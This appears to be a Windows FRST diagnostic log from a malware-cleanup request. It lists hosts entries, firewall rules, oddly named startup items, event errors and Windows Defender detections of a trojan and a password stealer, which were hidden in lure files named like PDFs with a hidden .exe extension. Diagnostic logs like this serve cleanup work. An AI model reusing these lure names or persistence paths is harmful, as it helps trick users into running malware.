2018-04-24 00:33 - 2018-04-24 00:33 - 000796160 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avformat-57.dll
2018-04-24 00:33 - 2018-04-24 00:33 - 000446976 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avutil-55.dll
2018-04-24 00:33 - 2018-04-24 00:33 - 001221120 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\avcodec-57.dll
2018-04-24 00:33 - 2018-04-24 00:33 - 000146944 _____ () C:\Users\Stanley\AppData\Roaming\uTorrent Web\swresample-2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 001042744 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2019-01-15 01:28 - 2019-01-15 01:28 - 000189752 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxslt.dll
2018-05-16 02:59 - 2018-05-16 02:59 - 000076088 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2018-04-12 18:06 - 2019-02-02 19:04 - 002901504 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libglesv2.dll
2018-04-12 18:06 - 2019-02-02 19:04 - 000015360 _____ () C:\Program Files (x86)\Microsoft\Skype for Desktop\libegl.dll
2019-02-09 01:00 - 2019-02-02 19:04 - 000405056 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\@paulcbetts\spellchecker\build\Release\spellchecker.node
2019-02-09 01:00 - 2019-02-02 19:04 - 000138816 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\keyboard-layout\build\Release\keyboard-layout-manager.node
2019-02-09 01:00 - 2019-02-02 19:05 - 003239784 _____ () \\?\C:\Program Files (x86)\Microsoft\Skype for Desktop\resources\app.asar.unpacked\node_modules\slimcore\bin\Processing.NDI.Lib.x86.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)


==================== Safe Mode (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)

IE trusted site: HKU\.DEFAULT\...\localhost -> localhost
IE trusted site: HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\localhost -> localhost

==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2013-08-22 14:25 - 2019-02-05 00:52 - 002097392 _____ C:\Windows\system32\drivers\etc\hosts

127.0.0.1 space1.adminpressure.space
127.0.0.1 trackpressure.website
127.0.0.1 htagzdownload.pw
127.0.0.1 texttotalk.org
127.0.0.1 360devtraking.website
127.0.0.1 room1.360dev.info
127.0.0.1 djapp.info
127.0.0.1 technologievimy.com

==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Stanley\AppData\Local\Microsoft\Windows\Themes\RoamedThemeFiles\DesktopBackground\img4.jpg
DNS Servers: 192.168.8.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer => (SmartScreenEnabled: Off)
Windows Firewall is enabled.

==================== MSCONFIG/TASK MANAGER disabled items ==

If an entry is included in the fixlist, it will be removed.

MSCONFIG\Services: TeamViewer => 2
MSCONFIG\Services: TenorshareWinAdService => 2
MSCONFIG\Services: WsAppService => 2
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "RIMDeviceManager"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "QTWQA7PTCRBGCEE"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "JKZDOH8VNLX91K7"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "4571129"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "Q92XOF6FK3X9RHU"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "6137198"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1204047"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "1214425"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9352489"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "9159382"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "E054W697C3ZT54X"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "19U1RNX4SXNVB7C"
HKU\S-1-5-21-1692593245-3285590566-2148222763-1001\...\StartupApproved\Run: => "SWPR71H14U5B9RU"

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{2E743188-52D4-4DD9-B217-D664724F7CFB}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{43AF7D70-137B-4B1D-AFE0-04F02D56545C}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{DD168D1B-C125-4EBC-A7D0-6AFF9BE0772A}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{42B93515-7C12-4002-B25A-7BD87FD5B851}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe (TeamViewer -> TeamViewer GmbH)
FirewallRules: [{7815BFA3-BBC0-42F3-B877-B594C5309503}] => (Allow) C:\Users\Stanley\AppData\Local\Google\Chrome\Application\chrome.exe No File
FirewallRules: [{27C2BBAD-5A0F-4576-A28A-A9C79B0F4F8D}] => (Allow) C:\Users\Stanley\AppData\Local\Temp\7ZipSfx.000\bin\tools\aria2c.exe No File
FirewallRules: [{DBF5369E-EA0B-4862-9E73-9A73C5F59B05}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{4591E89F-16AC-4CA7-8427-171CEC1BDB2B}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent Web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{20F020B5-B58A-41E0-B68B-68484D3D75D3}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{B8C7B80E-5D41-4712-B4F9-14A009440E40}] => (Allow) C:\Users\Stanley\AppData\Roaming\uTorrent\uTorrent.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [{6A75D8B5-DE20-4190-BE13-D677A70C815A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{22FE7C4C-E5B0-483D-B2B0-B3C0535F9642}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [TCP Query User{7E6EE6A2-2051-4E22-A8DA-500DD96D5B9F}C:\users\stanley\appdata\roaming\utorrent web\utweb.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [UDP Query User{177D6342-C5E0-42F8-BDF2-447498871528}C:\users\stanley\appdata\roaming\utorrent web\utweb.exe] => (Allow) C:\users\stanley\appdata\roaming\utorrent web\utweb.exe (BitTorrent Inc -> BitTorrent Inc.)
FirewallRules: [TCP Query User{3E58445D-EFFD-43A1-AEBD-5172049CF1D3}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [UDP Query User{B4F7868A-7743-4460-AB96-204D5F529A9D}C:\program files\videolan\vlc\vlc.exe] => (Allow) C:\program files\videolan\vlc\vlc.exe (VideoLAN -> VideoLAN)
FirewallRules: [{D6A6915E-8E38-4FA7-B167-934B21E2E6A6}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer)
FirewallRules: [{D2C7973D-DE98-449B-9679-37D96AAC096A}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{31AE2E75-E1A4-4EA8-AC68-234BD6A67E83}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{4FCA1FAA-8783-42DA-80FD-B7CCEEE6B919}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{FEB84E29-9231-4A79-8E14-2FB9168F73BC}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{EC7CB263-170E-4CD3-A718-B18FEBF58068}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{1EFA5CC6-47BC-403E-82CC-9C4013837F9E}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{630011AD-F4A2-4A96-8B7F-20609B1643C8}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\IncMail.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{604F39BF-F17A-42E2-8768-FD13618EADAD}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{1A05BB61-3191-442A-A7C8-3FD399D1C742}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImApp.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{AD0BAEF4-48BF-498A-B8E3-0D1E6B43B2BE}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{57D02F10-F87D-4455-8142-3BD552673374}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{7B7AEBBA-530C-47FF-B21F-41D628410DFC}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{587A092A-9420-4320-9DDC-513DB0956BC2}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F8E71DB-3CB9-46B0-9EEC-7E5BBF163810}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{F323F12D-3EEC-4458-B055-FBAD54D42779}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{3F67B498-C298-4567-8384-9D4AE7900D1F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{39A83BDE-1430-4A5B-8585-D464B7D8D881}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{9965AD37-C5DF-45BB-A1C2-549EA064C54F}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{B8A59D96-BE63-4FC8-A092-04A578AB2D75}] => (Allow) C:\Program Files (x86)\IncrediMail\Bin\ImpCnt.exe (IncrediMail Inc. -> IncrediMail Ltd.)
FirewallRules: [{0A99D9E6-8165-4C2D-862E-B5CA99B76F53}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer)
FirewallRules: [TCP Query User{FCAB66D8-96FF-4F4B-A106-15A490C11107}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [UDP Query User{C180034F-D109-4AFE-8F36-F09BB28A0030}C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe] => (Allow) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{F03F74C6-9B28-4C5E-807F-CFFCE0C2E487}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{5BAFDC52-58EF-4B5B-A341-46B75F445987}] => (Block) C:\windows.old\users\hp pc\appdata\local\google\chrome\application\chrome.exe No File
FirewallRules: [{7E343BED-6F88-4BCB-BE0E-54813155A57C}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer)
FirewallRules: [TCP Query User{F497E2E2-C9E6-45B2-A63B-16B5868BB75F}C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe] => (Allow) C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe (CommuniGate Systems -> CommuniGate Systems, Inc.)
FirewallRules: [UDP Query User{D68A9ADA-B646-45B9-BC3D-B69E53F63C97}C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe] => (Allow) C:\users\stanley\documents\documents\communigate pro software-62\communigatepro\cgserver.exe (CommuniGate Systems -> CommuniGate Systems, Inc.)
FirewallRules: [{D5FA44F3-6E70-484A-B950-51C23F63C442}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{798BE548-E73F-4AF0-94AC-9E161FCF481B}] => (Allow) C:\Program Files (x86)\AtomPark\Atomic Email Hunter\AtomicEmailHunter.exe No File
FirewallRules: [{B5F6D4BD-ADF9-4442-A0DC-0243CA6C4944}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{6B7EAF84-2E3E-4E50-BA29-83BCA3A5D636}] => (Allow) C:\Program Files (x86)\Email Extractor 6\Program.exe No File
FirewallRules: [{99A77A1E-39A2-4180-A680-B4F7DED82A23}] => (Allow) C:\Users\Stanley\Downloads\tenorshare-iphone-data-recovery-trial261.exe (Tenorshare Co.,Ltd. -> Tenorshare Co.Ltd)
FirewallRules: [{965E4860-FFA9-4075-B56B-8021BF7C78AC}] => (Allow) C:\Users\Stanley\Downloads\tenorshare-iphone-data-recovery-trial261.exe (Tenorshare Co.,Ltd. -> Tenorshare Co.Ltd)
FirewallRules: [{53056AED-CF0C-4B77-BE51-E7320F566EF1}] => (Allow) tunmgr.exe No File
FirewallRules: [{99F55921-8B24-4D45-9447-4B1DC03D0F8F}] => (Allow) tunmgr.exe No File
FirewallRules: [{926B5B97-5586-42AD-A783-764467766E9E}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{C1F252D6-9E31-4C1C-92CA-5144E45CBD5F}] => (Allow) mDNSResponder.exe No File
FirewallRules: [{6AFB9D26-FE77-4DC6-959A-0279CB780F2D}] => (Allow) C:\Program Files (x86)\Common Files\Research In Motion\nginx\nginx.exe (BlackBerry Ltd. -> )
FirewallRules: [{59D91197-B7DA-4EA6-B24C-745E78D3BD44}] => (Allow) C:\Program Files (x86)\Common Files\Research In Motion\tunnel manager\PeerManager.exe (BlackBerry Ltd. -> BlackBerry Limited)
FirewallRules: [{0E6991CE-14DF-4D95-80C9-B44D66357BF3}] => (Allow) C:\Program Files (x86)\BlackBerry\BlackBerry Blend\desktopinvokeproxy.exe (BlackBerry Ltd. -> BlackBerry Limited. All rights reserved)
FirewallRules: [TCP Query User{7B49542B-C789-47CD-9DB3-B7DD02A86347}C:\code crafters\ability mail server 4\amsmain.exe] => (Allow) C:\code crafters\ability mail server 4\amsmain.exe (Code Crafters Software Limited)
FirewallRules: [UDP Query User{EA212CF2-9380-45CC-A0BE-913C62F44EB3}C:\code crafters\ability mail server 4\amsmain.exe] => (Allow) C:\code crafters\ability mail server 4\amsmain.exe (Code Crafters Software Limited)
FirewallRules: [{C23152A2-4900-4C77-9D5F-439619037A3E}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc -> Google Inc.)
FirewallRules: [{4946DAD2-BDA2-4C06-AEDC-69B244D8AC93}] => (Allow) C:\Program Files\Opera\57.0.3098.106\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{2B35578A-2D33-4CA3-9363-D51EB0B19A68}] => (Allow) C:\Program Files\Opera\57.0.3098.116\opera.exe (Opera Software AS -> Opera Software)
FirewallRules: [{A84BF917-A1A7-4A9F-BFEA-0BB51E9A14F9}] => (Allow) C:\Program Files\iTunes\iTunes.exe (Apple Inc. -> Apple Inc.)
FirewallRules: [{3982D1B5-9BA8-4969-BF52-16243FA460F3}] => (Allow) C:\Program Files\Syncios\pdt_syncios.exe No File
FirewallRules: [{C51AA61B-9FE2-4471-AABA-59CE0EFF056F}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer)
FirewallRules: [{CAB19675-1F00-4595-9EF4-71D445CADCF3}] => (Allow) C:\Program Files (x86)\Anvsoft\Syncios\pdt_syncios.exe (Anvsoft Inc. -> Syncios Data Transfer)
FirewallRules: [{6F63DBCC-4ACC-457F-93AE-3F8F539D5481}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{38634E52-E26E-4827-B65C-6FD60DEEFCC1}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManager.exe No File
FirewallRules: [{B8B2B85F-89FA-41D1-84C9-AD725179C6CF}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{68A8AE5E-4C4A-41A3-9B22-62A04FA9BE31}] => (Allow) C:\Program Files (x86)\Apowersoft\ApowerManager\ApowerManagerCoreServices.exe No File
FirewallRules: [{221BFC9C-CC6F-4FE4-B04E-F71FA6660C03}] => (Allow) C:\Windows\rss\csrss.exe ()
FirewallRules: [{2443D1D6-CC7F-4A8D-8467-39EE257F12AF}] => (Allow) C:\Users\#Strazzo.RoseGold##\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe No File
FirewallRules: [{750614E7-22A3-4F87-88D1-B9F849CFB09C}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)
FirewallRules: [{5F4A2E85-3A49-4CDA-8F9E-184057B5476A}] => (Allow) C:\Program Files (x86)\Microsoft\Skype for Desktop\Skype.exe (Skype Software Sarl -> Skype Technologies S.A.)

==================== Restore Points =========================

20-01-2019 14:49:42 Scheduled Checkpoint
30-01-2019 08:42:13 Scheduled Checkpoint
07-02-2019 07:32:46 Scheduled Checkpoint

==================== Faulty Device Manager Devices =============

Name: 
Description: 
Class Guid: 
Manufacturer: 
Service: 
Problem: : The drivers for this device are not installed. (Code 28)
Resolution: To install the drivers for this device, click "Update Driver", which starts the Hardware Update wizard.


==================== Event log errors: =========================

Application errors:
==================
Error: (02/12/2019 06:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450
Faulting module name: ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0
Exception code: 0xc0000005
Fault offset: 0x000000000003de0e
Faulting process id: 0x1810
Faulting application start time: 0x01d4c296d845137b
Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 3148cd23-2e8a-11e9-8274-402cf4d8539a
Faulting package full name: 
Faulting package-relative application ID:

Error: (02/12/2019 06:51:08 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450
Faulting module name: ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0
Exception code: 0xc0000005
Fault offset: 0x000000000003de0e
Faulting process id: 0x1810
Faulting application start time: 0x01d4c296d845137b
Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 30c70117-2e8a-11e9-8274-402cf4d8539a
Faulting package full name: 
Faulting package-relative application ID:

Error: (02/12/2019 06:51:07 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450
Faulting module name: ntdll.dll, version: 6.3.9600.18969, time stamp: 0x5aa29ff0
Exception code: 0xc0000005
Fault offset: 0x000000000003de0e
Faulting process id: 0x1810
Faulting application start time: 0x01d4c296d845137b
Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Faulting module path: C:\Windows\SYSTEM32\ntdll.dll
Report Id: 3067a1aa-2e8a-11e9-8274-402cf4d8539a
Faulting package full name: 
Faulting package-relative application ID:

Error: (02/12/2019 06:50:26 AM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: chrome.exe, version: 71.0.3578.98, time stamp: 0x5c0f4450
Faulting module name: WINHTTP.dll, version: 0.0.0.0, time stamp: 0x5be6862f
Exception code: 0xc0000005
Fault offset: 0x0000000000003d68
Faulting process id: 0x1810
Faulting application start time: 0x01d4c296d845137b
Faulting application path: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Faulting module path: C:\Program Files (x86)\Google\Chrome\Application\WINHTTP.dll
Report Id: 17d7ce98-2e8a-11e9-8274-402cf4d8539a
Faulting package full name: 
Faulting package-relative application ID:

Error: (02/12/2019 06:42:05 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=NetworkAvailable

Error: (02/12/2019 06:42:00 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=1

Error: (02/12/2019 05:47:25 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=4

Error: (02/12/2019 05:45:57 AM) (Source: Software Protection Platform Service) (EventID: 8198) (User: )
Description: License Activation (slui.exe) failed with the following error code:
hr=0x8007007B
Command-line arguments:
RuleId=eeba1977-569e-4571-b639-7623d8bfecc0;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=81671aaf-79d1-4eb1-b004-8cbbe173afea;NotificationInterval=1440;Trigger=UserLogon;SessionId=3


System errors:
=============
Error: (02/12/2019 06:41:29 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The Iskysoft Application Framework Service service hung on starting.

Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Apple Mobile Device Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Media Player Network Sharing Service service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (02/12/2019 06:38:27 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Iskysoft Application Framework Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Presentation Foundation Font Cache 3.0.0.0 service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 0 milliseconds: Restart the service.

Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The BlackBerry Link Communication Manager service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 60000 milliseconds: Restart the service.

Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The iPod Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (02/12/2019 06:38:25 AM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The BlackBerry Device Manager service terminated unexpectedly.  It has done this 1 time(s).


Windows Defender:
===================================
Date: 2018-06-08 02:08:10.472
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: containerfile:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.ace;containerfile:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.ace;file:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.ace->AUDIT FOR 052018.PDF.exe;file:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.ace->Research Table N5900GH.pdf.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.269.584.0, AS: 1.269.584.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14901.4, NIS: 0.0.0.0

Date: 2018-06-08 02:01:10.450
Description: 
Windows Defender has detected malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Fuerboos.C!cl&threatid=2147723654&enterprise=0
Name: Trojan:Win32/Fuerboos.C!cl
ID: 2147723654
Severity: Severe
Category: Trojan
Path: file:_C:\Users\Stanley\Desktop\AUDIT FOR 052018.PDF.exe;file:_C:\Users\Stanley\Desktop\Research Table N5900GH.pdf.exe
Detection Origin: Local machine
Detection Type: FastPath
Detection Source: System
Process Name: Unknown
Signature Version: AV: 1.269.584.0, AS: 1.269.584.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14901.4, NIS: 0.0.0.0

Date: 2018-06-08 01:23:11.676
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {E75703DA-D253-4DDC-842F-2B0F9A3792FD}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2018-06-07 17:31:42.439
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {C77FBF52-7AF1-4C53-85F1-8C8D18BF5A75}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2018-06-07 17:18:05.871
Description: 
Windows Defender scan has been stopped before completion.
Scan ID: {06CD7F49-9CF6-446A-B793-6848E5293BA3}
Scan Type: Antimalware
Scan Parameters: Quick Scan

Date: 2018-05-29 09:02:21.940
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:5952,ProcessStart:131720254146746317
Detection Origin: Unknown
Detection Type: Concrete
Detection Source: System
Process Name: C:\Users\Stanley\AppData\Local\Temp\~AceTemp\APPROVED_DOCUMENTS_2018_PDF\APPROVED DOCUMENTS 2018_PDF.exe
Action: Quarantine
Action Status:  To finish removing malware and other potentially unwanted software, you need to run a full scan. For information about scanning options, see Help and Support. 
To finish removing malware and other potentially unwanted software, restart the computer. 
Error Code: 0x8007054f
Error description: An internal error occurred. 
Signature Version: AV: 1.267.1085.0, AS: 1.267.1085.0, NIS: 0.0.0.0
Engine Version: AM: 1.1.14800.3, NIS: 0.0.0.0

Date: 2018-05-16 13:56:59.426
Description: 
Windows Defender has encountered a critical error when taking action on malware or other potentially unwanted software.
For more information please see the following:
http://go.microsoft.com/fwlink/?linkid=37020&name=PWS:Win32/Dyzap.X&threatid=2147717189&enterprise=0
Name: PWS:Win32/Dyzap.X
ID: 2147717189
Severity: Severe
Category: Password Stealer
Path: process:_pid:4316,ProcessStart:131708507062533276
